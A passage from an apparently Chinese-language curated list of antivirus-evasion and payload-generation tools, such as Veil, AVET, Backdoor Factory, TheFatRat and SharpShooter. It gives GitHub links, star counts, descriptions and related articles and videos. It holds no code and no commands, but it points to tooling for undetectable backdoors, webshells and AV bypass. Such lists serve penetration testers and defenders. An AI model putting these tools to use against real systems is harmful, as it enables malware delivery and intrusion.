3.0](https://www.fireeye.com/blog/threat-research/2017/03/_antivirus_evasionr.html) - 2016.09 [polaris] [使用 Veil-Evasion+Metasploit 打造免杀 Payload](http://polaris-lab.com/index.php/archives/51/) - 2016.07 [JackkTutorials] [How to Bypass antiviruses with Veil Evasion](https://www.youtube.com/watch?v=3WPoD8F5V64) - 2016.05 [JackkTutorials] [How to install Veil Framework on Kali Linux 2016.1](https://www.youtube.com/watch?v=V_zByjIeLxY) - 2016.05 [tevora] [Dissecting Veil-Evasion Powershell Payloads and Converting to a Bind Shell](http://threat.tevora.com/dissecting-veil-evasion-powershell-payloads-and-converting-to-a-bind-shell/) - 2016.04 [cylance] [Veil-Evasion Vulnerability Discovered by Cylance](https://www.cylance.com/en_us/blog/veil-evasion-vulnerability-discovered-by-cylance.html) - 2016.04 [hack] [Veil Evasion: Payloads Made Easy](https://hack-ed.net/2016/04/04/veil-evasion-payloads-made-easy/) - 2016.02 [kalitutorials] [Antivirus Evasion : Bypassing AV with Veil](https://www.kalitutorials.net/2016/02/antivirus-evasion-bypassing-av-with-veil.html) - 2015.12 [freebuf] [Kali 2.0教程:如何安装Veil-Evasion](http://www.freebuf.com/sectool/89024.html) - 2015.10 [secist] [手工测试Veil-Evasion过360和Dirty COW(内附视频)](http://www.secist.com/archives/1849.html) - 2015.10 [secist] [免杀后门(二)之MSF&Veil-Catapult的完美结合](http://www.secist.com/archives/1130.html) - 2015.10 [secist] [免杀后门之MSF&Veil-Evasion的完美结合](http://www.secist.com/archives/1107.html) - 2015.10 [christophertruncer] [Veil-Framework and ChristopherTruncer Website Brute Force and Just-Metadata](https://www.christophertruncer.com/veil-framework-brute-force-and-just-metadata/) - 2015.03 [harmj0y] [Drilling deeper with Veil's PowerTools](https://www.slideshare.net/harmj0y/drilling-deeper-with-veils-powertools) - 2014.12 [cyberarms] [Installing Veil Framework on Kali Linux](https://cyberarms.wordpress.com/2014/12/14/installing-veil-framework-on-kali-linux/) - 2014.08 [harmj0y] [Finding Local Admin with the Veil-Framework](http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/) - 2014.07 [netspi] [Bypassing AV with Veil-Evasion](https://blog.netspi.com/bypassing-av-with-veil-evasion/) - 2014.06 [harmj0y] [Veil-PowerView: A Usage Guide](http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/) - 2014.04 [bluescreenofjeff] [Fresh Veil](https://bluescreenofjeff.com/2014-04-17-Fresh-Veil-Automatically-Generating-Payloads/) - 2014.01 [christophertruncer] [Developing a Self-Brute Forcing Payload for Veil](https://www.christophertruncer.com/developing-self-brute-forcing-payload-veil/) - 2013.11 [freebuf] [免杀Payload生成工具Veil使用视频演示(视频)](http://www.freebuf.com/video/17369.html) - 2013.10 [cyberarms] [Veil AV Bypass on Kali](https://cyberarms.wordpress.com/2013/10/12/veil-av-bypass-on-kali/) - 2013.06 [] [Veil—绕过杀毒软件的payload生成器](http://www.91ri.org/6227.html) - 2013.06 [hackingarticles] [Veil – A Metasploit Payload Generator to Bypass Antivirus](http://www.hackingarticles.in/veil-a-metasploit-payload-generator-to-bypass-antivirus/) - 2013.06 [cyberarms] [Creating Remote Shells that Bypass Anti-Virus with “Veil”](https://cyberarms.wordpress.com/2013/06/04/creating-remote-shells-that-bypass-anti-virus-with-veil/) - 2013.06 [freebuf] [Veil – 免杀payload生成工具](http://www.freebuf.com/sectool/10087.html) - 2013.05 [christophertruncer] [Veil – A Payload Generator to Bypass Antivirus](https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/) - 2010.05 [netspi] [Echo Mirage: Piercing the Veil of Thick Application Security](https://blog.netspi.com/echo-mirage-piercing-the-veil-of-thick-application-security/) # <a id="2b42bd6443319711cc12f2f6e50ddbfe"></a>ASWCrypter *** ## <a id="8f0b8198835e2c90692ec1376e30a689"></a>工具 - [**273**星][2y] [Shell] [abedalqaderswedan1/aswcrypter](https://github.com/abedalqaderswedan1/aswcrypter) An Bash&Python Script For Generating Payloads that Bypasses All Antivirus so far [FUD] # <a id="4a1d607241b8f21b06664347f39a339c"></a>AVIator *** ## <a id="10901ea9fcdafae3e4c34da73b435cee"></a>工具 - [**329**星][6m] [C#] [ch0pin/aviator](https://github.com/ch0pin/aviator) Antivirus evasion project *** ## <a id="49b348e0e13fd9ebff7dcdaafe2c2b9b"></a>文章 - 2014.04 [holisticinfosec] [Browse this: & Oryon C Portable & WhiteHat Aviator](https://holisticinfosec.blogspot.com/2014/04/browse-this-oryon-c-portable-whitehat.html) # <a id="a0849be5404b3ed7c789e979cc3b1382"></a>Avet *** ## <a id="27953172d38e0d8a401b0e614b9287ec"></a>工具 - [**1095**星][11d] [C] [govolution/avet](https://github.com/govolution/avet) 免杀工具 - [**3**星][1y] [C] [govolution/avetosx](https://github.com/govolution/avetosx) AntiVirus Evasion Tool *** ## <a id="90c144f7f5eed8792ccab8c9e602a403"></a>文章 - 2019.07 [govolution] [Slides – Introduction to AVET](https://danielsauder.com/2019/07/29/slides-introduction-to-avet/) - 2018.09 [govolution] [Avet setup.sh script](https://danielsauder.com/2018/09/28/avet-setup-sh-script/) - 2018.08 [3gstudent] [AntiVirus Evasion Tool(avet)测试分析](https://3gstudent.github.io/3gstudent.github.io/AntiVirus-Evasion-Tool(avet)%E6%B5%8B%E8%AF%95%E5%88%86%E6%9E%90/) - 2018.08 [3gstudent] [AntiVirus Evasion Tool(avet)测试分析](https://3gstudent.github.io/3gstudent.github.io/AntiVirus-Evasion-Tool(avet)%E6%B5%8B%E8%AF%95%E5%88%86%E6%9E%90/) - 2018.08 [govolution] [Paper AVET BLACKHAT USA ARSENAL 2018](https://danielsauder.com/2018/08/07/paper-avet-blackhat-usa-arsenal-2018/) - 2018.08 [govolution] [Paper AVET BLACKHAT USA ARSENAL 2018](https://govolution.wordpress.com/2018/08/07/paper-avet-blackhat-usa-arsenal-2018/) - 2018.03 [rapid7] [Cavete Symantec Testimonium Exspirare Martiis (Beware the Symantec Certificates Expiring in March)](https://blog.rapid7.com/2018/03/21/cavete-symantec-testimonium-exspirare-martiis-beware-the-symantec-certificates-expiring-in-march/) - 2017.11 [cybersecurityinterviews] [043 – David Navetta: The Year Of the Phishing Attack](https://cybersecurityinterviews.com/043-david-navetta-year-phishing-attack/) - 2017.08 [360] [avet:杀软绕过工具使用教程](https://www.anquanke.com/post/id/86558/) - 2017.07 [govolution] [Paper AVET Blackhat USA 2017](https://govolution.wordpress.com/2017/07/27/paper-avet-blackhat-usa-2017/) - 2017.06 [govolution] [AVET video](https://govolution.wordpress.com/2017/06/11/avet-video/) - 2017.05 [govolution] [AVET and unstaged payloads](https://govolution.wordpress.com/2017/05/06/avet-and-unstaged-payloads/) - 2017.04 [govolution] [Slides Owasp Meeting Cologne AVET](https://govolution.wordpress.com/2017/04/28/slides-owasp-meeting-cologne-avet/) - 2017.03 [n0where] [AntiVirus Evasion Tool: AVET](https://n0where.net/antivirus-evasion-tool-avet) # <a id="0ce51643a8accfa61b1920747b92347b"></a>Avoidz *** ## <a id="dd3084ae08dd36d458ad17df487c2976"></a>工具 - [**119**星][12d] [Ruby] [m4sc3r4n0/avoidz](https://github.com/m4sc3r4n0/avoidz) Avoidz tool to bypass most A.V softwares # <a id="0f9a694410214f0e09caaa0132968656"></a>BDF *** ## <a id="2b8c4e72ae18bc130b5cc45b22882d85"></a>工具 - [**2475**星][14d] [Py] [secretsquirrel/the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) 为PE, ELF, Mach-O二进制文件添加Shellcode后门 - [**788**星][3y] [Py] [secretsquirrel/bdfproxy](https://github.com/secretsquirrel/bdfproxy) Patch Binaries via MITM: BackdoorFactory + mitmProxy. (NOT SUPPORTED) *** ## <a id="9dbfd4fdbf6435ac9913a1d83c5c3c7c"></a>文章 - 2017.11 [aliyun] [基于BDF的免杀](https://xz.aliyun.com/t/1567) - 2017.11 [aliyun] [利用BDF向DLL文件植入后门](https://xz.aliyun.com/t/1484) - 2017.10 [4hou] [利用BDF向DLL文件植入后门](http://www.4hou.com/technology/8205.html) - 2017.10 [4hou] [利用BDF向EXE文件植入后门](http://www.4hou.com/technology/8204.html) - 2017.10 [3gstudent] [利用BDF向DLL文件植入后门](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/) - 2017.10 [3gstudent] [利用BDF向DLL文件植入后门](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/) - 2017.10 [3gstudent] [利用BDF向EXE文件植入后门](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/) - 2017.10 [3gstudent] [利用BDF向EXE文件植入后门](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/) - 2016.06 [secureallthethings] [BDF Preprocessor and Going Forward](http://secureallthethings.blogspot.com/2016/06/bdf-preprocessor-and-going-forward.html) - 2015.12 [secureallthethings] [Add PE Code Signing to Backdoor Factory (BDF)](http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html) - 2015.10 [secist] [免杀后门(三)之backdoor-factory patch注入绕过](http://www.secist.com/archives/1210.html) - 2015.02 [secureallthethings] [New BDF Feature: Import Table 'Patching'](http://secureallthethings.blogspot.com/2015/02/new-bdf-feature-import-table-patching.html) - 2014.08 [toolswatch] [Backdoor Factory Proxy (BDFProxy) v0.1 Released](http://www.toolswatch.org/2014/08/backdoor-factory-proxy-bdfproxy-v0-1-released/) # <a id="b3a06244641c573c12d076de5cedb37a"></a>CACTUSTORCH *** ## <a id="e0cb098391fd9ed90121e2916b9d6e1f"></a>工具 - [**598**星][3y] [Visual Basic .NET] [mdsecactivebreach/cactustorch](https://github.com/mdsecactivebreach/cactustorch) Payload Generation for Adversary Simulations - [**108**星][3y] [Shell] [xillwillx/cactustorch_ddeauto](https://github.com/xillwillx/cactustorch_ddeauto) OFFICE DDEAUTO Payload Generation script - [**51**星][12d] [Visual Basic] [vysecurity/cactustorch](https://github.com/vysecurity/CACTUSTORCH) Payload Generation for Adversary Simulations *** ## <a id="1a5f76b8dc23b9db07ada5e84395e918"></a>文章 - 2018.07 [4hou] [CactusTorch通过.net无文件感染受害者](http://www.4hou.com/technology/12822.html) - 2018.07 [mcafee] [CactusTorch Fileless Threat Abuses .NET to Infect Victims](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cactustorch-fileless-threat-abuses-net-to-infect-victims/) - 2018.07 [mcafee] [CactusTorch Fileless Threat Abuses .NET to Infect Victims](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cactustorch-fileless-threat-abuses-net-to-infect-victims/) - 2018.07 [mcafee] [CactusTorch Fileless Threat Abuses .NET to Infect Victims](https://securingtomorrow.mcafee.com/mcafee-labs/cactustorch-fileless-threat-abuses-net-to-infect-victims/) - 2018.06 [vysec] [Payload Generation with CACTUSTORCH](https://medium.com/p/d61b84ad207d) - 2017.07 [mdsec] [CACTUSTORCH 实战](https://www.mdsec.co.uk/2017/07/payload-generation-with-cactustorch/) # <a id="cef3b934de15377654f46f1e1ac60b34"></a>DKMC *** ## <a id="46b192d2a3ba0747e84e2aaef1b0dd9e"></a>工具 - [**761**星][1y] [Py] [mr-un1k0d3r/dkmc](https://github.com/mr-un1k0d3r/dkmc) DKMC - Dont kill my cat - Malicious payload evasion tool *** ## <a id="1125d9d5b37b5a78bd067fbe3ffbc595"></a>文章 - 2018.03 [govolution] [Download & Exec PoC and DKMC](https://govolution.wordpress.com/2018/03/02/download-exec-poc-and-dkmc/) - 2018.03 [govolution] [Download & Exec PoC and DKMC](https://danielsauder.com/2018/03/02/download-exec-poc-and-dkmc/) - 2017.09 [secist] [DKMC | bmp | Msf | kali linux 2017](http://www.secist.com/archives/4995.html) # <a id="61bd903441458d02b5f29e0c7c88772c"></a>GreatSCT *** ## <a id="8db87bb7235bd7bbd5c172d162d76f9a"></a>工具 - [**778**星][2y] [Py] [greatsct/greatsct](https://github.com/greatsct/greatsct) 生成绕过常见防病毒解决方案和应用程序白名单解决方案的metasploit payload *** ## <a id="af1bbce8299e80c5d895279059d5f2e8"></a>文章 - 2019.01 [hackingarticles] [GreatSct – An Application Whitelist Bypass Tool](https://www.hackingarticles.in/greatsct-an-application-whitelist-bypass-tool/) - 2018.01 [secist] [GreatSCT | MSF | 白名单](http://www.secist.com/archives/6082.html) # <a id="3c299dae55724965657ddae00d58f445"></a>Green-Hat-Suite *** ## <a id="fedf1b28a3eaafa5e1c7195622961dac"></a>工具 - [**107**星][12d] [Ruby] [green-m/green-hat-suite](https://github.com/green-m/green-hat-suite) Green-hat-suite is a tool to generate meterpreter/shell which could evade antivirus. # <a id="374c9d9255645a308f45c5861c90982b"></a>HERCULES *** ## <a id="bbaceff782da895cb6436580b9faf348"></a>工具 - [**471**星][3y] [Go] [egebalci/hercules](https://github.com/egebalci/hercules) HERCULES is a special payload generator that can bypass antivirus softwares. *** ## <a id="ac892582920f6b3faa83996fe7d32f7c"></a>文章 - 2018.11 [astr0baby] [Running MVS 3.8 on Hercules NetBSD arm64 Pinebook](https://astr0baby.wordpress.com/2018/11/27/running-mvs-3-8-on-hercules-netbsd-arm64-pinebook/) - 2018.07 [SSTecTutorials] [Hercules - Automated Free VPN Connection on Kali Linux 2018.2](https://www.youtube.com/watch?v=oEr_aQFuLHM) - 2018.06 [DoktorCranium] [Running Ubuntu 18.04 Server s390x in Hercules Mainframe simulator](https://www.youtube.com/watch?v=Y1qgH0gat0A) - 2018.06 [astr0baby] [Installing Ubuntu 18.04 Server s390x in Hercules Mainframe simulator](https://astr0baby.wordpress.com/2018/06/03/installing-ubuntu-18-04-server-s390x-in-hercules-mainframe-simulator/) - 2018.06 [DoktorCranium] [Mainframe Z/OS 1.10 Hercules on Linux](https://www.youtube.com/watch?v=_KA1VGq5plo) - 2017.06 [freebuf] [如何用HERCULES绕过杀软](http://www.freebuf.com/articles/system/135938.html) - 2016.09 [n0where] [Special Customizable Payload Generator: Hercules](https://n0where.net/special-customizable-payload-generator-hercules) - 2016.06 [hackingarticles] [Bypass All Antivirus and Hack Remote Windows 10 PC using Hercules](http://www.hackingarticles.in/bypass-antivirus-hack-remote-windows-10-pc-using-hercules/) # <a id="c88f6e7d1b8e5fbdc160f547436a1765"></a>Python-Rootkit *** ## <a id="53f087810d39f686bc430fc16b4b57cf"></a>工具 - [**310**星][13d] [Py] [0xislamtaha/python-rootkit](https://github.com/0xIslamTaha/Python-Rootkit) Python远控,用于获取Meterpreter会话 # <a id="dc799b61ee105a1d1821f79483e19ae6"></a>SharpShooter *** ## <a id="0af225b9b7d5680725f82edddbfde244"></a>工具 - [**898**星][1y] [Visual Basic .NET] [mdsecactivebreach/sharpshooter](https://github.com/mdsecactivebreach/sharpshooter) Payload Generation Framework *** ## <a id="2990cb241fd645b9d3fca7617004e98d"></a>文章 - 2019.03 [carbonblack] [TAU Threat Intelligence Notification: Operation SharpShooter](https://www.carbonblack.com/2019/03/18/tau-threat-intelligence-notification-operation-sharpshooter/) - 2019.02 [mdsec] [Macros and More with SharpShooter v2.0](https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/) - 2018.12 [4hou] [以全球关键基础设施为目标的新攻击活动——Operation Sharpshooter](http://www.4hou.com/web/15235.html) - 2018.12 [mcafee] [‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/) - 2018.12 [mcafee] [‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/) - 2018.10 [pediy] [[翻译]使用 Sharpshooter + SquibblyTwo 绕过 AMSI 防御的技巧](https://bbs.pediy.com/thread-247202.htm) - 2018.09 [countercept] [Analyzing Sharpshooter – Part 2](https://countercept.com/blog/analyzing-sharpshooter-part-2/) - 2018.09 [4hou] [渗透测试技巧:如何使用Sharpshooter+SquibblyTwo绕过AMSI防御](http://www.4hou.com/technology/13299.html) - 2018.08 [countercept] [Analyzing Sharpshooter - Part 2](https://countercept.com/our-thinking/analyzing-sharpshooter-part-2/) - 2018.08 [0x00sec] [Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo](https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178/) - 2018.08 [countercept] [Analyzing Sharpshooter – Part 1](https://countercept.com/blog/analyzing-sharpshooter-part-1/) - 2018.08 [countercept] [Analyzing Sharpshooter - Part 1](https://countercept.com/our-thinking/analyzing-sharpshooter-part-1/) - 2018.08 [morphisec] [SharpShooter Pen Testing Framework Used by Attackers](http://blog.morphisec.com/sharpshooter-pen-testing-framework-used-in-attacks) - 2018.07 [n0where] [Payload Generation Framework: SharpShooter](https://n0where.net/payload-generation-framework-sharpshooter) - 2018.06 [mdsec] [FreeStyling with SharpShooter v1.0](https://www.mdsec.co.uk/2018/06/freestyling-with-sharpshooter-v1-0/) - 2018.03 [360] [如何使用SharpShooter生成Payload](https://www.anquanke.com/post/id/100533/) - 2018.03 [mdsec] [SharpShooter介绍](https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/) - 2015.06 [trendmicro] [Cybercriminal Sharpshooters: Nigerian Scammers Use HawkEye to Attack Small Businesses](https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminal-sharpshooters-nigerian-scammers-use-hawkeye-to-attack-small-businesses/) # <a id="0ea62b3f2d6a28ea5fca3b040430dbc9"></a>SpookFlare *** ## <a id="910a7d5c31f4d0ecf0bf54c6e2420c56"></a>工具 - [**780**星][1y] [Py] [hlldz/spookflare](https://github.com/hlldz/spookflare) Loader, dropper generator with multiple features for bypassing client-side and network-side countermeasures. *** ## <a id="411fee0ed40668884479e464bf994ba4"></a>文章 - 2018.05 [n0where] [Meterpreter Loader Generator: SpookFlare](https://n0where.net/meterpreter-loader-generator-spookflare) - 2017.11 [360] [SpookFlare: 黑暗中前行](https://www.anquanke.com/post/id/87278/) # <a id="2844bde3d954b4af180d188082fea3ec"></a>TheFatRat *** ## <a id="9a8cd34cea64c0825e53fcdda0c122e4"></a>工具 - [**3659**星][3m] [C] [screetsec/thefatrat](https://github.com/screetsec/thefatrat) 大规模漏洞利用工具 - [**20**星][4y] [C] [exploit-install/thefatrat](https://github.com/exploit-install/thefatrat) An easy tool to generate backdoor with msfvenom (a part from metasploit framework). This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection *** ## <a id="dd5dea07a5d0415b767d925d04e99e0f"></a>文章 - 2020.03 [hakin9] [TheFatRat - A Massive Exploiting Tool](https://hakin9.org/thefatrat-a-massive-exploiting-tool/) - 2019.03 [HackerSploit] [How To Automatically Embed Payloads In APK's - Evil-Droid, Thefatrat & Apkinjector](https://www.youtube.com/watch?v=C_Og6LnEZSg) - 2018.11 [freebuf] [技术分享 | 看我如何使用TheFatRat黑掉你的Android手机](https://www.freebuf.com/articles/terminal/188986.html) - 2017.11 [TheHackerStuff] [TheFatRat - Hacking Over WAN - Embedding Payload in Original Android APK - Without Port Forwarding](https://www.youtube.com/watch?v=XLNigYZ5-fM) - 2017.02 [n0where] [Generate Backdoor With msfvenom: TheFatRat](https://n0where.net/generate-backdoor-with-msfvenom-thefatrat) - 2016.12 [TheHackerStuff] [Kali Linux - TheFatRat - Creating an Undetectable Backdoor - Bypass all AntiVirus](https://www.youtube.com/watch?v=uwMRuQBVS7k) - 2016.09 [freebuf] [TheFatRat:Msfvenom傻瓜化后门生成工具](http://www.freebuf.com/sectool/113597.html) - 2016.07 [hackingarticles] [Hack Remote Windows 10 PC using TheFatRat](http://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat/) # <a id="2f025b72723b0bad9b30bb79ed3f47ae"></a>Venom *** ## <a id="52dcc58dcf9e0e09c5f9d2fc3cc64f72"></a>工具 - [**1192**星][9d] [yzddmr6/webshell-venom](https://github.com/yzddmr6/webshell-venom) 免杀webshell无限生成工具(利用随机异或无限免杀D盾) - [**637**星][7d] [Shell] [r00t-3xp10it/venom](https://github.com/r00t-3xp10it/venom) shellcode 生成器、编译器、处理器(metasploit) - [**273**星][11d] [JS] [yzddmr6/as_webshell_venom](https://github.com/yzddmr6/as_webshell_venom) 免杀webshell无限生成工具蚁剑版 - [**122**星][14d] [Py] [wetw0rk/malicious-wordpress-plugin](https://github.com/wetw0rk/malicious-wordpress-plugin) 生成带反向 Shell 的 wordpress 插件 - [**100**星][26d] [Py] [lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) Cryptovenom: The Cryptography Swiss Army Knife - [**8**星][28d] [Shell] [manofftoday/venomdroid3](https://github.com/manofftoday/venomdroid3) Script that easily creates, signs and AV bypass .apk metasploit reverse_tcp payload. *** ## <a id="1131eb654d689690d462d86a3ffb2f1a"></a>文章 - 2019.11 [aliyun] [venom的powershell免杀技术分析](https://xz.aliyun.com/t/6649) - 2019.06 [JosephDelgadillo] [Learn System Hacking E20: Exploiting Android and iOS Devices with Venom](https://www.youtube.com/watch?v=mRSJeh7EyOQ) - 2018.11 [freebuf] [如果有人使用VENOM工具绕过反病毒检测,该如何防护?](https://www.freebuf.com/articles/network/188515.html) - 2018.02 [pentesttoolz] [VENOM 1.0.15 – Metasploit Shellcode Generator/Compiler/Listener](https://pentesttoolz.com/2018/02/11/venom-1-0-15-metasploit-shellcode-generator-compiler-listener/) - 2017.02 [secist] [免杀后门(五):Venom结合Metasploit绕过360(内附视频)](http://www.secist.com/archives/2598.html) - 2017.02 [UltraHacks] [VenomLogger - Keylogger || PROMOTION ||](https://www.youtube.com/watch?v=ssEOWsW049k) - 2016.02 [hackingarticles] [Exploitation of Windows PC using Venom: Shellcode Generator](http://www.hackingarticles.in/exploitation-of-windows-pc-using-venom-shellcode-generator/) - 2016.01 [n0where] [Shellcode Generator: Venom](https://n0where.net/shellcode-generator-venom) # <a id="c1d31bd6ecf78f7a3fc7fc52ac202d95"></a>Winpayloads *** ## <a id="453757cab7a1b573f10f088f8ccbed81"></a>工具 - [**1093**星][11m] [Py] [nccgroup/winpayloads](https://github.com/nccgroup/winpayloads) Undetectable Windows Payload Generation *** ## <a id="665371c5a04efeeb3540ec331d75b198"></a>文章 - 2018.03 [freebuf] [Winpayloads:不可检测的Windows Payload生成工具](http://www.freebuf.com/sectool/163013.html) - 2017.07 [freebuf] [WinPayloads:一个可以绕过安全检查的Windowspayload生成器](http://www.freebuf.com/sectool/140794.html) - 2016.02 [charliedean] [WinPayloads - Undetectable Windows Payload Generation](http://charliedean.github.io/Winpayloads/) - 2016.01 [hackingarticles] [Winpayloads: Undetectable Windows Payload Generation](http://www.hackingarticles.in/winpayloads-undetectable-windows-payload-generation/) # <a id="78d4960c1617befde6be1c374e5e224e"></a>nps_payload *** ## <a id="bd2624d62630d556efa8f431429f3a28"></a>工具 - [**331**星][12d] [Py] [trustedsec/nps_payload](https://github.com/trustedsec/nps_payload) Python 脚本,生成能够绕过基础入侵检测的 payload - [**32**星][2m] [Py] [fsacer/nps_payload](https://github.com/fsacer/nps_payload) This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. Written by Larry Spohn ( *** ## <a id="1c6d137ac85ae2d158e343ba1327ffde"></a>文章 - 2019.03 [hackingarticles] [nps_payload: An Application Whitelisting Bypass Tool](https://www.hackingarticles.in/nps_payload-an-application-whitelisting-bypass-tool/) - 2017.08 [n0where] [Intrusion Detection Avoidance Payload Generator: NPS_Payload](https://n0where.net/intrusion-detection-avoidance-payload-generator-nps_payload) - 2017.07 [trustedsec] [New Tool Release: NPS_Payload](https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/) # <a id="fedbeafa34f02f951f0792a799d4073d"></a>zirikatu *** ## <a id="f3fb6776c2d0d008630311e19e9ba7c1"></a>工具 - [**136**星][3y] [Shell] [pasahitz/zirikatu](https://github.com/pasahitz/zirikatu) Fud Payload generator script *** ## <a id="733a0143baef08c6229e70dda5b4fa65"></a>文章 - 2017.04 [secist] [Metasploit系列课程第三课:Msf&zirikatu免杀结合利用(附PPT)](http://www.secist.com/archives/3113.html) # <a id="3d7c6c6fc7f0bd776051bee516d94d0f"></a>unicorn *** ## <a id="bc86fda39a6ec0976b23b66f79308389"></a>工具 - [**2209**星][4m] [Py] [trustedsec/unicorn](https://github.com/trustedsec/unicorn) 通过PowerShell降级攻击, 直接将Shellcode注入到内存 # <a id="619a40fa2c43bfd68c1449c7481c42db"></a>Shellter *** ## <a id="b0c0f53e7fa8ab994270778efe65f413"></a>文章 - 2020.02 [crowdstrike] [Gimme Shellter](https://www.crowdstrike.com/blog/how-shellter-is-used-to-bypass-antivirus-products/) - 2018.11 [securityartwork] [Evading AV with Shellter. I also have Sysmon & Wazuh III. GAME OVER](https://www.securityartwork.es/2018/11/06/evading-av-with-shellter-i-also-have-sysmon-wazuh-iii-game-over/) - 2018.11 [securityartwork] [Evading AV with Shellter. I also have Sysmon and Wazuh II](https://www.securityartwork.es/2018/11/05/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-ii/) - 2018.11 [securityartwork] [Evading AV with Shellter. I also have Sysmon and Wazuh I](https://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/) - 2017.01 [DemmSec] [HOW TO MAKE MALWARE UNDETECTABLE! (SHELLTER)](https://www.youtube.com/watch?v=VYphlYD8mQ4) - 2016.08 [evi1cg] [Shellter Custom payload](https://evi1cg.me/archives/Shellter_Custom_payload.html) - 2015.12 [n0where] [Dynamic Shellcode Injection: Shellter](https://n0where.net/dynamic-shellcode-injection-shellter) - 2015.10 [freebuf] [Kali Shellter 5.1:动态ShellCode注入工具 绕过安全软件](http://www.freebuf.com/sectool/81955.html) - 2015.10 [secist] [免杀后门(四)之shellter注入绕过](http://www.secist.com/archives/1181.html) - 2015.10 [cyberarms] [Anti-Virus Bypass with Shellter 5.1 on Kali Linux](https://cyberarms.wordpress.com/2015/10/04/anti-virus-bypass-with-shellter-5-1-on-kali-linux/) - 2015.08 [anti] [Shellter V & Kali 2.0](http://www.anti-reversing.com/1858/) - 2015.07 [cyberarms] [Anti-Virus Bypass with Shellter 4.0 on Kali Linux](https://cyberarms.wordpress.com/2015/07/12/anti-virus-bypass-with-shellter-4-0-on-kali-linux/) - 2015.07 [BsidesLisbon] [BSidesLisbon2015 - Shellter - A dynamic shellcode injector - Kyriakos Economou](https://www.youtube.com/watch?v=TunWNHYrWp8) - 2015.06 [freebuf] [动态Shellcode注入工具 – Shellter](http://www.freebuf.com/sectool/71230.html) - 2014.08 [toolswatch] [Shellter v1.7 A Dynamic ShellCode Injector – Released](http://www.toolswatch.org/2014/08/shellter-v1-7-a-dynamic-shellcode-injector-released/) - 2014.06 [toolswatch] [[New Tool] Shellter v1.0 A Dynamic ShellCode Injector – Released](http://www.toolswatch.org/2014/06/new-tool-shellter-v1-0-a-dynamic-shellcode-injector-released/) - 2013.12 [anti] [A Shellter for your shellcode…](http://www.anti-reversing.com/1257/) # <a id="68856cb6cd8a71236b7ab0dd8ae6e4f3"></a>dr0p1t *** ## <a id="a338777a3909deef427bc71b1e2c31aa"></a>工具 - [**1034**星][2y] [Py] [d4vinci/dr0p1t-framework](https://github.com/d4vinci/dr0p1t-framework) 创建免杀的Dropper *** ## <a id="05cbac684baf2b4169f77fe3b3001ce6"></a>文章 - 2017.07 [secist] [Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架](http://www.secist.com/archives/3850.html) - 2017.07 [freebuf] [Dr0p1t-Framework:一个可以绕过多数杀软的木马生成框架](http://www.freebuf.com/sectool/139455.html) - 2017.07 [n0where] [Advanced Stealthy Dropper: Dr0p1t Framework](https://n0where.net/advanced-stealthy-dropper-dr0p1t-framework) # <a id="03faa45aa2511d31e470556f664c3dbb"></a>phantom *** ## <a id="f6fa26843c6cc22c7277b9f609bb5067"></a>工具 - [**778**星][4m] [Py] [oddcod3/phantom-evasion](https://github.com/oddcod3/phantom-evasion) 一个用python编写的防病毒规避工具(与python和python3兼容),能够生成(几乎)完全不可检测的可执行文件,即使是使用最常见的x86 msfvenom负载。 *** ## <a id="eaaefa10905a4a70b7638dc0a3888576"></a>文章 - 2018.05 [pentesttoolz] [Phantom Evasion – Python AV Evasion Tool – Generate (Almost) FUD Payload – Kali Linux 2018.2](https://pentesttoolz.com/2018/05/18/phantom-evasion-python-av-evasion-tool-generate-almost-fud-payload-kali-linux-2018-2/) # <a id="1e6a9c93f0c18239195ee1550e8c8286"></a>morphaes *** ## <a id="b2c88539436be2829d0a004f959c88ca"></a>工具 - [**262**星][2y] [Py] [cryptolok/morphaes](https://github.com/cryptolok/morphaes) 多态shellcode引擎,具有变态特性并能够绕过沙箱,绕过IDPS检测 *** ## <a id="b0f82b4b4cfbc920f9696fba1b2ef219"></a>文章 - 2016.07 [n0where] [IDPS SandBox AntiVirus Stealth Killer: MorphAES](https://n0where.net/idps-sandbox-antivirus-stealth-killer-morphaes) # <a id="7eb9d59bc55e5f016a3cebb83d1a1b92"></a>unibyav *** ## <a 